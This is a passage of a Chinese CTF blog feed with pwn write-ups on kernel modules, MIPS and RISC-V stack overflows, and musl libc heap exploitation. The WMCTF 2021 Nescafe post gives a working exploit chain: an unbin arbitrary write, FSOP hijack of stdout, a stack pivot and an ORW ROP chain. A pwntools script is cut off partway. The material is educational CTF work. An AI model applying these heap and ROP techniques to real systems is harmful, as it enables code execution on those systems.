class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> printk(KERN_INFO <span class="string">"Hello, exit!\n"</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">module_init(hello_init);</span><br><span class="line">module_exit(hello_exit);</span><br></pre></td></tr></table></figure><p>之后, 将module.ko加入内核模块,注意生成的模块名字不能以module命名,否则就会出现如下报错</p><p><img src="/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/image-20210909190445406.png" alt="image-20210909190445406"></p><p>module改成helloworld就好了</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">KERNEL_DIR := /lib/modules/<span class="variable">$(<span class="built_in">shell</span> uname -r)</span>/build</span><br><span class="line">PWD := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line">helloworld-objs := hello.o</span><br><span class="line">obj-m := helloworld.o</span><br><span class="line"><span class="section">default:</span></span><br><span class="line"><span class="variable">$(MAKE)</span> -C <span class="variable">$(KERNEL_DIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">dmesg | tail -n 1</span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">dmesg | tail -n 2</span></span><br><span class="line">[49622.167231] module: module is already loaded</span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">sudo rmmod helloworld</span></span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">dmesg | tail -n 2</span></span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line">[50164.206571] Hello, exit!</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><blockquote>
<p>之前实在看不懂Wiki上的入门讲解,现在跟着轩哥博客试着入门kernel</p>
</blockquote></summary>
<category term="kernel" scheme="https://brooke-hub.github.io/tags/kernel/"/>
</entry>
<entry>
<title>MIPS_PWN_入门</title>
<link href="https://brooke-hub.github.io/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/"/>
<id>https://brooke-hub.github.io/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/</id>
<published>2021-09-09T03:58:37.000Z</published>
<updated>2021-09-13T09:13:52.492Z</updated>
<content type="html"><![CDATA[<blockquote><p>整理一下mips</p></blockquote><span id="more"></span><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><p>mipsrop</p><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><h3 id="Mplogin"><a href="#Mplogin" class="headerlink" title="Mplogin"></a>Mplogin</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">file Mplogin</span> </span><br><span class="line">Mplogin: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">checksec Mplogin</span></span><br><span class="line">[*] '/home/wendy/Desktop/mips/Mplogin/Mplogin'</span><br><span class="line"> Arch: mips-32-little</span><br><span class="line"> RELRO: No RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX disabled</span><br><span class="line"> PIE: No PIE (0x400000)</span><br><span class="line"> RWX: Has RWX segments</span><br></pre></td></tr></table></figure><p>使用qemu的user模式mipsel(小端)运行</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">tree -N -L 2</span></span><br><span class="line">.</span><br><span class="line">├── lib</span><br><span class="line">│ ├── ld-uClibc.so.0</span><br><span class="line">│ └── libc.so.0</span><br><span class="line">└── Mplogin</span><br><span class="line"></span><br><span class="line">1 directory, 3 files</span><br></pre></td></tr></table></figure><p>题目给了lib 直接-L ./ 加载当前目录的lib库</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">qemu-mipsel -L ./ Mplogin</span> </span><br><span class="line">-----we1c0me t0 MP l0g1n s7stem-----</span><br><span class="line">Username : </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>ida分析一下</p><p>sub_400840函数,再次打印时使用%s可以打印出栈信息</p><p>sub_400978函数,可以栈溢出</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">qemu-mipsel -g 1237 -L ./ Mplogin</span> </span><br><span class="line">-----we1c0me t0 MP l0g1n s7stem-----</span><br><span class="line">Username : adminbbbb</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch</span> </span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> ls</span></span><br><span class="line">lib Mplogin</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> file Mplogin</span> </span><br><span class="line">Reading symbols from Mplogin...</span><br><span class="line">(No debugging symbols found in Mplogin)</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> <span class="built_in">set</span> architecture mips</span></span><br><span class="line">The target architecture is assumed to be mips</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> target remote :1237</span></span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> b *0x00400920</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/image-20210909151721939.png" alt="image-20210909151721939"></p>]]></content>
<summary type="html"><blockquote>
<p>整理一下mips</p>
</blockquote></summary>
<category term="mips" scheme="https://brooke-hub.github.io/tags/mips/"/>
</entry>
<entry>
<title>RISC-V_pwn_初探</title>
<link href="https://brooke-hub.github.io/2021/09/09/RISC-V-pwn-%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/09/RISC-V-pwn-%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-09T02:04:00.000Z</published>
<updated>2021-09-13T09:12:14.956Z</updated>
<content type="html"><![CDATA[<blockquote><p>拖了很久的异构pwn,打算用*ctf2021的一道栈溢出来入门</p></blockquote><span id="more"></span><h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch -v</span></span><br><span class="line">GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2</span><br><span class="line">Copyright (C) 2020 Free Software Foundation, Inc.</span><br><span class="line">License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html></span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br></pre></td></tr></table></figure><h2 id="测试栈溢出"><a href="#测试栈溢出" class="headerlink" title="测试栈溢出"></a>测试栈溢出</h2><p>直接用题目给的qemu-riscv64运行即可</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./qemu-riscv64 -g 1234 ./main</span> </span><br><span class="line">Input the flag: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</span><br><span class="line">You are wrong ._.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>用gef调试方便riscv寄存器</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch</span> </span><br><span class="line"></span><br><span class="line">gef➤ file main</span><br><span class="line">Reading symbols from main...</span><br><span class="line">(No debugging symbols found in main)</span><br><span class="line">gef➤ set architecture riscv:rv64 </span><br><span class="line">The target architecture is assumed to be riscv:rv64</span><br><span class="line">gef➤ target remote :1234</span><br><span class="line">Remote debugging using :1234</span><br><span class="line">0x00000000000101c0 in ?? ()</span><br><span class="line"></span><br><span class="line">gef➤ c</span><br><span class="line">Continuing.</span><br><span class="line"></span><br><span class="line">Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x6161616161616160 in ?? ()</span><br><span class="line"></span><br><span class="line">gef➤ p $pc</span><br><span class="line"><span class="meta">$</span><span class="bash">1 = (void (*)()) 0x6161616161616160</span></span><br><span class="line">gef➤ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>没有NX,所以一般的思路都是ret2shellcode</p><p>qemu-user的各种地址在同一个环境下都是固定的,包括栈地址,所以需要知道远端的栈地址,然后把shellcode放在栈上</p><p>题目给了远程环境的docker,可以本地调试得到远端地址</p>]]></content>
<summary type="html"><blockquote>
<p>拖了很久的异构pwn,打算用*ctf2021的一道栈溢出来入门</p>
</blockquote></summary>
<category term="异构" scheme="https://brooke-hub.github.io/tags/%E5%BC%82%E6%9E%84/"/>
</entry>
<entry>
<title>musl_pwn_初探</title>
<link href="https://brooke-hub.github.io/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-05T02:25:28.000Z</published>
<updated>2021-09-23T08:13:57.523Z</updated>
<content type="html"><![CDATA[<blockquote><p>准备复现5道musl pwn,其中4道都是1.2.2版本的,源码实在看不下去呜呜呜,还是跟之前学glibc一样,直接去gdb看数据来理解结构和内存管理。musl里没有malloc_hook和free_hook,所以保护全开的时候通常只能打FILE结构体。先从类似glibc的1.1.24版本入手。</p></blockquote><span id="more"></span><h1 id="Version-1-1-24"><a href="#Version-1-1-24" class="headerlink" title="Version 1.1.24"></a>Version 1.1.24</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><blockquote><p><a href="https://musl.libc.org/">musl libc</a> 是一个专门为嵌入式系统开发的轻量级 libc 库,以简单、轻量和高效率为特色。有不少 Linux 发行版将其设为默认的 libc 库,用来代替体积臃肿的 glibc ,如 <a href="https://zh.wikipedia.org/zh-cn/Alpine_Linux">Alpine Linux</a>(做过 Docker 镜像的应该很熟悉)、<a href="https://zh.wikipedia.org/wiki/OpenWrt">OpenWrt</a>(常用于路由器)和 Gentoo 等。</p><p>musl libc 堆管理器约等同于<code>dlmalloc</code>(glibc 堆管理器<code>ptmalloc2</code>的前身),因此某些部分如 chunk、unbin 与 glibc 十分相似。</p></blockquote><h2 id="数据结构"><a href="#数据结构" class="headerlink" title="数据结构"></a>数据结构</h2><p>详细讲解 <a href="https://www.anquanke.com/post/id/202253#h2-4">从一次 CTF 出题谈 musl libc 堆漏洞利用</a></p><p>源码 <a href="https://github.com/bminor/musl/blob/v1.1.24/src/malloc/malloc.c">v1.1.24/src/malloc/malloc.c</a></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> {</span></span><br><span class="line"> <span class="keyword">size_t</span> psize, csize; <span class="comment">// 相当于 glibc 的 prev size 和 size</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">next</span>, *<span class="title">prev</span>;</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>psize和csize最低位都是inuse标志位</p><p><strong>chunk 大小:从0x20开始,以0x20跨度递增(而不是0x10)</strong></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> {</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">uint64_t</span> binmap;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">bin</span> <span class="title">bins</span>[64];</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> free_lock[<span class="number">2</span>];</span><br><span class="line">} mal;</span><br></pre></td></tr></table></figure><p><code>mal</code>结构体类似于 glibc 中的<code>main_arena</code></p><p>有三个成员:64位无符号整数<code>binmap</code>、链表头部数组<code>bins</code>和锁<code>free_lock</code>。</p><p><code>binmap</code>记录每个 bin 是否为非空,若某个比特位为 1,表示对应的 bin 为非空,即 bin 链表中有 chunk。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bin</span> {</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> lock[<span class="number">2</span>];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">head</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">tail</span>;</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>bin 是由 64 个结构类似 small bin 的双向循环链表组成,维护链表的方式是 FILO(从链表首部取出 chunk,从尾部插入 chunk)。</p><p>malloc大概过程:</p><p>根据size计算出对应bin的索引,然后查找binmap看看对应bin上有没有空闲chunk,如果有就unbin操作取出head指向的chunk</p><h2 id="常见利用"><a href="#常见利用" class="headerlink" title="常见利用"></a>常见利用</h2><p>取出 chunk 的过程中没有对链表和 chunk 头部进行任何检查。</p><p>利用unbin将目标地址插入bin中,实现任意地址写</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">unbin</span><span class="params">(struct chunk *c, <span class="keyword">int</span> i)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">if</span> (c->prev == c->next)</span><br><span class="line">a_and_64(&mal.binmap, ~(<span class="number">1ULL</span><<i));</span><br><span class="line">c->prev->next = c->next;</span><br><span class="line">c->next->prev = c->prev;</span><br><span class="line">c->csize |= C_INUSE;</span><br><span class="line">NEXT_CHUNK(c)->psize |= C_INUSE;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="WMCTF-2021-Nescafe"><a href="#WMCTF-2021-Nescafe" class="headerlink" title="WMCTF_2021_Nescafe"></a><strong>WMCTF_2021_Nescafe</strong></h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./libc.so</span> </span><br><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.1.24</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p>musl 1.1.24的版本和glibc差不多</p><p>chunk结构很相似,常用的小bin管理类似于smallbin的双向链表管理</p><p>本题exp参考 <a href="https://blog.csdn.net/qq_39948058/article/details/120035403?spm=1001.2014.3001.5501">WMCTF 2021 pwn Azly复现</a></p><h3 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a><strong>静态分析</strong></h3><p>沙箱禁用了execve</p><p>chunk size 0x200</p><p>idx 0-4</p><p>free后指针没置零,可以edit和show</p><p>只能show一次</p><h3 id="how-to-leak"><a href="#how-to-leak" class="headerlink" title="how to leak"></a><strong>how to leak</strong></h3><p>chunk被释放后被插入bin(mal+384),以双向链表进行管理</p><p>chunk的<code>next*</code>和<code>pre*</code>指针域就会被写入bin地址</p><p>可以uaf,直接show 得到libc地址</p><h3 id="how-to-hijack"><a href="#how-to-hijack" class="headerlink" title="how to hijack"></a><strong>how to hijack</strong></h3><blockquote><p>gdb下使用 <code>p mal</code> 可以查看所有bin</p></blockquote><p>①如下mal+384可以理解成bin</p><p>首先add两个0x200的chunk,bin一直指向top chunk以便下次分配</p><p>free chunk0后bin指向了chunk0</p><p>chunk0的两个指针域也指向了bin</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911221746016.png" alt="image-20210911221746016"></p><p>②uaf 修改chunk0的两个指针域</p><p>next设置为bin-0x8</p><p>pre设置为目标地址</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk = p64(mal+<span class="number">400</span>-<span class="number">0x18</span>) <span class="comment"># mal+376</span></span><br><span class="line">fake_chunk += p64(libc.sym[<span class="string">'__stdin_FILE'</span>]+<span class="number">0x40</span>) </span><br><span class="line">edit(<span class="number">0</span>,fake_chunk) </span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222824673.png" alt="image-20210911222824673"></p><p>③根据bins的head取出chunk0的空间,作为chunk2</p><p>并进行unlink</p><p>chunk0(chunk2)的pre(即目标地址stdin_FILE+0x40)作为bin的新head</p><p>同时,目标地址stdin_FILE+0x40的fd被写入原chunk0的fd</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="string">'B'</span>*<span class="number">0x100</span>)<span class="comment">#2 stdin_file </span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222129217.png" alt="image-20210911222129217"></p><p>④根据bins的head取出stdin_FILE+0x40的空间,作为chunk3</p><p>成功申请到目标地址</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'A'</span>*<span class="number">0x30</span>+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x50</span>)+p64(ret)+p64(<span class="number">0</span>)+p64(mov_rdx) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">0</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>])+p64(pop_rdx)+p64(<span class="number">0x500</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line">add(<span class="string">'C'</span>*<span class="number">0xb0</span>+payload)<span class="comment">#3</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222907607.png" alt="image-20210911222907607"></p><h3 id="从stdin溢出到stdout"><a href="#从stdin溢出到stdout" class="headerlink" title="从stdin溢出到stdout"></a><strong>从stdin溢出到stdout</strong></h3><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911174349792.png" alt="image-20210911174349792"></p><h3 id="(FSOP)修改-stdout-上的函数指针劫持程序控制流,进行栈迁移ROP"><a href="#(FSOP)修改-stdout-上的函数指针劫持程序控制流,进行栈迁移ROP" class="headerlink" title="(FSOP)修改 stdout 上的函数指针劫持程序控制流,进行栈迁移ROP"></a><strong>(FSOP)修改 stdout 上的函数指针劫持程序控制流,进行栈迁移ROP</strong></h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mov_rdx = libc.address+<span class="number">0x000000000004951a</span> </span><br><span class="line"><span class="comment"># 0x7f687c98751a <longjmp+34>:mov rdx,QWORD PTR [rdi+0x30]</span></span><br><span class="line"><span class="comment"># 0x7f687c98751e <longjmp+38>:mov rsp,rdx</span></span><br><span class="line"><span class="comment"># 0x7f687c987521 <longjmp+41>:mov rdx,QWORD PTR [rdi+0x38]</span></span><br><span class="line"><span class="comment"># 0x7f687c987525 <longjmp+45>:jmp rdx</span></span><br><span class="line">payload = <span class="string">'E'</span>*<span class="number">0x30</span></span><br><span class="line">payload += p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x50</span>)+p64(ret) <span class="comment">#0x30</span></span><br><span class="line">payload += p64(<span class="number">0</span>)+p64(mov_rdx) <span class="comment">#0x40</span></span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">0</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>])+p64(pop_rdx)+p64(<span class="number">0x500</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">leak(<span class="string">'pop_rdi'</span>,pop_rdi)</span><br><span class="line">pause()</span><br><span class="line">add(<span class="string">'C'</span>*<span class="number">0xb0</span>+payload)<span class="comment">#3</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911224458218.png" alt="image-20210911224458218"></p><p>这样就会执行gadget</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">mov rdx,QWORD PTR [rdi+0x30] </span><br><span class="line"># 将stdout_FILE+0x30地址上的内容(stdout_FILE+0x50)放入rdx </span><br><span class="line"># rdi:stdout_FILE+0x30 // rdx:stdout_FILE+0x50</span><br><span class="line"></span><br><span class="line">mov rsp,rdx </span><br><span class="line"># 栈顶指向stdout_FILE+0x50(存放了pop rdi gadget地址)</span><br><span class="line"># rsp=rdx:stdout_FILE+0x50</span><br><span class="line"></span><br><span class="line">mov rdx,QWORD PTR [rdi+0x38] </span><br><span class="line"># 将stdout_FILE+0x38地址上的内容(ret gadget地址)放入rdx</span><br><span class="line"># rdx: ret_addr</span><br><span class="line"></span><br><span class="line">jmp rdx </span><br><span class="line"># 跳到ret gadget地址,执行pop rip</span><br><span class="line"># 将栈顶的pop rdi gadget地址弹出并跳转执行</span><br><span class="line"># 继续ROP,执行完read(0,addr,0x500)</span><br></pre></td></tr></table></figure><h3 id="执行-orw-ROP-读取-flag"><a href="#执行-orw-ROP-读取-flag" class="headerlink" title="执行 orw ROP 读取 flag"></a><strong>执行 orw ROP 读取 flag</strong></h3><p>向__stdout_FILE地址写入如下,</p><p>主要是在__stdout_FILE+0x38处开始写入gadget,再次ROP</p><p>因为执行SYS_read后会跳转到__stdout_FILE+0x38上的地址(调试得到偏移 )</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'A'</span>*<span class="number">0x38</span> </span><br><span class="line">payload += p64(pop_rdi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x100</span>)+p64(pop_rsi)+p64(<span class="number">0</span>)+p64(libc.sym[<span class="string">'open'</span>]) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x200</span>)+p64(pop_rdx) +p64(<span class="number">0x100</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">1</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x200</span>)+p64(pop_rdx) +p64(<span class="number">0x100</span>)+p64(libc.sym[<span class="string">'write'</span>]) </span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>,<span class="string">'\x00'</span>)+<span class="string">"./flag\x00"</span></span><br></pre></td></tr></table></figure><p>类似题目还有 <a href="https://www.anquanke.com/post/id/202253#h3-11">2020 XCTF 高校战“疫” musl-master</a></p><p>堆溢出漏洞,同样是利用unbin劫持</p><p>只写到申请出stdin,后面有点麻烦不想写了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process([<span class="string">"./libc.so"</span>,<span class="string">"./carbon"</span>])</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : 